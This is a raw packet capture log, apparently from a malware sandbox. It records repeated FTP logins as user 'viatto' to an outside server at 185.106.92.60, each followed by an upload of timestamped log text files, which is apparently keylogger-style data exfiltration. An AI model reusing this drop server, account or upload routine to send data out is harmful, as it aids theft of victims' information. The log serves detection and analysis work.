                                                                                                                                    Oct 10, 2022 06:02:26.179256916 CEST2149747185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,20)
                                                                                                                                    Oct 10, 2022 06:02:26.203735113 CEST4974721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.23.txt
                                                                                                                                    Oct 10, 2022 06:02:26.227003098 CEST2149747185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:26.300576925 CEST2149747185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:26.510538101 CEST2149749185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:26.510613918 CEST2149749185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:26.510648966 CEST2149749185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:26.510967016 CEST4974921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:26.534046888 CEST2149749185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:26.534321070 CEST4974921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:26.557298899 CEST2149749185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:26.559933901 CEST4974921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:26.583210945 CEST2149749185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:26.583482027 CEST4974921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:26.606687069 CEST2149749185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:26.607278109 CEST4974921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:26.630069971 CEST2149749185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:26.631192923 CEST4974921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:26.655092001 CEST2149749185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,21)
                                                                                                                                    Oct 10, 2022 06:02:26.678828955 CEST4974921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.24.txt
                                                                                                                                    Oct 10, 2022 06:02:26.701984882 CEST2149749185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:26.726069927 CEST2149749185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:26.913997889 CEST2149751185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:26.914016962 CEST2149751185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:26.914028883 CEST2149751185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:26.914314985 CEST4975121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:26.938612938 CEST2149751185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:26.938879013 CEST4975121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:26.963206053 CEST2149751185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:26.964164972 CEST4975121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:26.988044024 CEST2149751185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:26.988353968 CEST4975121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:27.013952017 CEST2149751185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:27.015237093 CEST4975121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:27.038867950 CEST2149751185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:27.046520948 CEST4975121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:27.071388006 CEST2149751185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,22)
                                                                                                                                    Oct 10, 2022 06:02:27.098135948 CEST4975121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.25.txt
                                                                                                                                    Oct 10, 2022 06:02:27.122947931 CEST2149751185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:27.148246050 CEST2149751185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:27.336124897 CEST2149753185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:27.336146116 CEST2149753185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:27.336158991 CEST2149753185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:27.336652994 CEST4975321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:27.360908031 CEST2149753185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:27.361177921 CEST4975321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:27.386550903 CEST2149753185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:27.386898041 CEST4975321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:27.410043001 CEST2149753185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:27.410573959 CEST4975321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:27.436216116 CEST2149753185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:27.436733007 CEST4975321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:27.462589025 CEST2149753185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:27.463716984 CEST4975321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:27.490226984 CEST2149753185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,23)
                                                                                                                                    Oct 10, 2022 06:02:27.513791084 CEST4975321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.26.txt
                                                                                                                                    Oct 10, 2022 06:02:27.538522005 CEST2149753185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:27.562412977 CEST2149753185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:27.747332096 CEST2149755185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:27.747350931 CEST2149755185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:27.747363091 CEST2149755185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:27.747994900 CEST4975521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:27.770977974 CEST2149755185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:27.771816969 CEST4975521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:27.794589043 CEST2149755185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:27.795839071 CEST4975521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:27.818536997 CEST2149755185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:27.819093943 CEST4975521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:27.842153072 CEST2149755185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:27.844141960 CEST4975521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:27.866974115 CEST2149755185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:27.869079113 CEST4975521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:27.892412901 CEST2149755185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,25)
                                                                                                                                    Oct 10, 2022 06:02:27.923419952 CEST4975521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.27.txt
                                                                                                                                    Oct 10, 2022 06:02:27.948359013 CEST2149755185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:27.975126028 CEST2149755185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:28.192397118 CEST2149757185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:28.192423105 CEST2149757185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:28.192748070 CEST2149757185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:28.195347071 CEST4975721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:28.221292973 CEST2149757185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:28.224623919 CEST4975721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:28.250910044 CEST2149757185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:28.255887032 CEST4975721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:28.283354998 CEST2149757185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:28.283714056 CEST4975721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:28.310784101 CEST2149757185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:28.315413952 CEST4975721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:28.341032982 CEST2149757185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:28.360105038 CEST4975721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:28.386359930 CEST2149757185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,26)
                                                                                                                                    Oct 10, 2022 06:02:28.418236017 CEST4975721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.28.txt
                                                                                                                                    Oct 10, 2022 06:02:28.444776058 CEST2149757185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:28.483726025 CEST2149757185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:28.675847054 CEST2149759185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:28.676048994 CEST2149759185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:28.676095963 CEST2149759185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:28.723756075 CEST4975921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:28.747049093 CEST2149759185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:28.882860899 CEST4975921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:28.906424046 CEST2149759185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:28.941957951 CEST4975921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:28.965467930 CEST2149759185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:28.965883017 CEST4975921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:28.989356995 CEST2149759185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:28.989785910 CEST4975921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:29.013032913 CEST2149759185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:29.036597967 CEST4975921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:29.060138941 CEST2149759185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,28)
                                                                                                                                    Oct 10, 2022 06:02:29.085874081 CEST4975921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.29.txt
                                                                                                                                    Oct 10, 2022 06:02:29.109637022 CEST2149759185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:29.169944048 CEST2149759185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:29.421080112 CEST2149761185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:29.421235085 CEST2149761185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:29.421463966 CEST2149761185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:29.422960997 CEST4976121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:29.446134090 CEST2149761185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:29.477344036 CEST4976121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:29.500371933 CEST2149761185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:29.501437902 CEST4976121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:29.524068117 CEST2149761185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:29.530775070 CEST4976121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:29.578232050 CEST2149761185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:29.585611105 CEST4976121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:29.608407021 CEST2149761185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:29.609435081 CEST4976121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:29.632493019 CEST2149761185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,29)
                                                                                                                                    Oct 10, 2022 06:02:29.661701918 CEST4976121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.30.txt
                                                                                                                                    Oct 10, 2022 06:02:29.685189962 CEST2149761185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:30.194761038 CEST2149761185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:30.475207090 CEST2149763185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:30.475265980 CEST2149763185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:30.475368977 CEST2149763185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:30.492580891 CEST4976321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:30.516453981 CEST2149763185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:30.529813051 CEST4976321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:30.552877903 CEST2149763185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:30.554917097 CEST4976321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:30.577776909 CEST2149763185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:30.582098007 CEST4976321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:30.605350018 CEST2149763185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:30.642442942 CEST4976321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:30.665505886 CEST2149763185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:30.778769016 CEST4976321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:30.802059889 CEST2149763185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,31)
                                                                                                                                    Oct 10, 2022 06:02:31.495666981 CEST4976321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.31.txt
                                                                                                                                    Oct 10, 2022 06:02:31.519145012 CEST2149763185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:31.576520920 CEST2149763185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:31.787218094 CEST2149765185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:31.787261009 CEST2149765185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:31.787291050 CEST2149765185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:31.787549019 CEST4976521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:31.810152054 CEST2149765185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:31.811372042 CEST4976521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:31.834110022 CEST2149765185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:31.834397078 CEST4976521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:31.857028961 CEST2149765185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:31.858302116 CEST4976521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:31.881305933 CEST2149765185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:31.881895065 CEST4976521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:31.904555082 CEST2149765185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:31.905492067 CEST4976521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:31.928499937 CEST2149765185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,32)
                                                                                                                                    Oct 10, 2022 06:02:31.954828024 CEST4976521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.32.txt
                                                                                                                                    Oct 10, 2022 06:02:31.978929996 CEST2149765185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:32.003607988 CEST2149765185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:32.199062109 CEST2149767185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:32.199110031 CEST2149767185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:32.199141979 CEST2149767185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:32.199481964 CEST4976721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:32.222172976 CEST2149767185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:32.226371050 CEST4976721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:32.249381065 CEST2149767185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:32.249649048 CEST4976721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:32.272532940 CEST2149767185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:32.273134947 CEST4976721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:32.296111107 CEST2149767185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:32.296896935 CEST4976721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:32.319521904 CEST2149767185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:32.322315931 CEST4976721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:32.345490932 CEST2149767185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,33)
                                                                                                                                    Oct 10, 2022 06:02:32.369599104 CEST4976721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.33.txt
                                                                                                                                    Oct 10, 2022 06:02:32.393385887 CEST2149767185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:32.418211937 CEST2149767185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:32.638695002 CEST2149769185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:32.638740063 CEST2149769185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:32.638772011 CEST2149769185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:32.639554977 CEST4976921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:32.710424900 CEST2149769185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:32.711024046 CEST4976921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:32.734493017 CEST2149769185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:32.740672112 CEST4976921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:32.763777971 CEST2149769185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:32.775907040 CEST4976921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:32.799809933 CEST2149769185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:32.800522089 CEST4976921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:32.823554993 CEST2149769185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:32.825529099 CEST4976921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:32.849025011 CEST2149769185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,34)
                                                                                                                                    Oct 10, 2022 06:02:32.875776052 CEST4976921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.34.txt
                                                                                                                                    Oct 10, 2022 06:02:32.899382114 CEST2149769185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:32.923808098 CEST2149769185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:33.151302099 CEST2149771185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:33.151351929 CEST2149771185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:33.151386023 CEST2149771185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:33.151937008 CEST4977121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:33.176651955 CEST2149771185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:33.186963081 CEST4977121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:33.211821079 CEST2149771185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:33.212419987 CEST4977121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:33.237184048 CEST2149771185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:33.237742901 CEST4977121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:33.263272047 CEST2149771185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:33.269151926 CEST4977121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:33.293469906 CEST2149771185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:33.296348095 CEST4977121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:33.321394920 CEST2149771185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,36)
                                                                                                                                    Oct 10, 2022 06:02:33.348794937 CEST4977121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.35.txt
                                                                                                                                    Oct 10, 2022 06:02:33.373284101 CEST2149771185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:33.399696112 CEST2149771185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:33.597141981 CEST2149773185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:33.597188950 CEST2149773185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:33.597220898 CEST2149773185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:33.597563028 CEST4977321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:33.620511055 CEST2149773185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:33.620779037 CEST4977321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:33.651284933 CEST2149773185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:33.651515961 CEST4977321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:33.674530983 CEST2149773185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:33.674844980 CEST4977321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:33.698417902 CEST2149773185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:33.698859930 CEST4977321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:33.721641064 CEST2149773185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:33.723345041 CEST4977321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:33.746406078 CEST2149773185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,37)
                                                                                                                                    Oct 10, 2022 06:02:33.769821882 CEST4977321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.36.txt
                                                                                                                                    Oct 10, 2022 06:02:33.793351889 CEST2149773185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:33.817286015 CEST2149773185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:34.026175976 CEST2149775185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:34.026593924 CEST2149775185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:34.026640892 CEST2149775185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:34.028101921 CEST4977521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:34.051199913 CEST2149775185.106.92.60192.168.2.3331 Password required for viatto
